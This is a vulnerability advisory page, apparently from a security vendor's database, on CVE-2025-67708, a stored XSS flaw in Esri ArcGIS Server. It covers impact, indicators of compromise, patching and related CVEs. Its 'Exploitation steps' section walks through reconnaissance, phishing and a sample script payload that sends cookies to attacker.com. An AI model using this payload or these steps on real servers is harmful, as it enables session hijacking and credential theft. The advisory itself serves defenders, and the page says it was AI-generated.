CVE-2025-67708
ArcGIS Server vulnerability analysis and mitigation

Overview

CVE-2025-67708 is a stored cross-site scripting (XSS) vulnerability in Esri ArcGIS Server versions 11.4 and earlier on both Windows and Linux platforms. In certain configurations, a remote unauthenticated attacker can store files containing malicious code on the server, which may then execute in the context of a victim's browser. The vulnerability was published on December 31, 2025, and a patch was made available via the ArcGIS Server Security 2025 Update 2 release. It carries a CVSS v3.1 base score of 6.1 (Medium) (Esri Advisory, EUVD).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) XSS variant. In certain ArcGIS Server configurations, the application fails to adequately sanitize or restrict file uploads or content submissions from unauthenticated users, allowing malicious scripts to be persisted on the server. When a victim subsequently accesses the affected resource through their browser, the stored malicious code executes within the browser's security context. No authentication or elevated privileges are required by the attacker, though user interaction (a victim visiting the malicious content) is necessary for exploitation (Esri Advisory, EUVD).

Impact

Successful exploitation could allow an attacker to execute arbitrary JavaScript in the context of a victim's browser session on the ArcGIS Server web interface. This may lead to session hijacking, credential theft, unauthorized data access, or further malicious actions against authenticated users of the platform. The scope is changed (S:C in CVSS), meaning the impact extends beyond the vulnerable component to the victim's browser environment, affecting both confidentiality and integrity at a low level, with no direct availability impact (EUVD).

Exploitability

As of the time of disclosure, there is no public proof-of-concept exploit code and no evidence of active in-the-wild exploitation (EUVD). The EPSS score is approximately 0.04%, indicating a low probability of exploitation in the near term. No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires no authentication but does require a victim to interact with the maliciously stored content.

Exploitation steps

  1. Reconnaissance: Identify publicly accessible ArcGIS Server instances running version 11.4 or earlier using tools like Shodan or Censys, or by directly probing known ArcGIS Server URL patterns.
  2. Identify vulnerable configuration: Determine whether the target instance is configured in a way that permits unauthenticated file uploads or content submissions to server-accessible locations.
  3. Craft malicious payload: Prepare a file or content submission containing a stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) designed to execute in a victim's browser.
  4. Store the payload: Submit the malicious file or content to the ArcGIS Server endpoint that allows unauthenticated storage, causing the payload to be persisted on the server.
  5. Trigger victim execution: Lure an authenticated ArcGIS Server user (e.g., via phishing or a crafted link) to access the resource containing the stored payload, causing the malicious script to execute in their browser context.
  6. Harvest results: Collect stolen session tokens, credentials, or other sensitive data exfiltrated to the attacker-controlled server, enabling session hijacking or further unauthorized access (Esri Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP/HTTPS requests from victim browsers to unknown external domains shortly after accessing ArcGIS Server resources; unusual POST requests from unauthenticated sources to ArcGIS Server file upload or content submission endpoints.
  • Logs: ArcGIS Server access logs showing unauthenticated POST requests to file storage or content endpoints with suspicious payloads; server logs indicating storage of files with .html, .js, or script-containing content from anonymous users.
  • File System: Presence of unexpected files containing <script> tags or JavaScript payloads in ArcGIS Server web-accessible directories or upload folders.
  • Browser/Application: Victim browsers making unexpected requests to external domains after interacting with ArcGIS Server content; reports from users of unexpected redirects or pop-ups when accessing ArcGIS Server resources.

Mitigation and workarounds

Esri has released the ArcGIS Server Security 2025 Update 2 patch to address this vulnerability; organizations running ArcGIS Server versions 10.9.1 through 11.4 should apply this patch immediately (Esri Advisory). As an interim measure for organizations unable to patch immediately, implement network-level controls to restrict unauthenticated access to ArcGIS Server endpoints, particularly those that allow file uploads or content submissions. Additionally, educate users to avoid clicking on suspicious links or accessing untrusted content within the ArcGIS Server environment.

Community reactions

The vulnerability received limited public attention at the time of disclosure, with coverage primarily from automated vulnerability tracking services and aggregators such as Vulners, VulDB, and CIRCL's vulnerability lookup. A brief mention appeared on Bluesky via automated CVE tracking accounts. No significant researcher commentary, vendor statements beyond the patch advisory, or major media coverage has been identified for this CVE.

Additional resources


SourceThis report was generated using AI

Related ArcGIS Server vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-9182CRITICAL9.8
  • ArcGIS Server logoArcGIS Server
  • cpe:2.3:a:esri:arcgis_server
NoNoJul 06, 2026
CVE-2026-9181HIGH7.5
  • ArcGIS Server logoArcGIS Server
  • cpe:2.3:a:esri:arcgis_server
NoNoJul 06, 2026
CVE-2025-67711MEDIUM6.1
  • ArcGIS Server logoArcGIS Server
  • cpe:2.3:a:esri:arcgis_server
NoNoDec 31, 2025
CVE-2026-2812MEDIUM5.3
  • ArcGIS Server logoArcGIS Server
  • cpe:2.3:a:esri:arcgis_server
NoNoMay 20, 2026
CVE-2026-2813MEDIUM4.1
  • ArcGIS Server logoArcGIS Server
  • cpe:2.3:a:esri:arcgis_server
NoNoMay 20, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management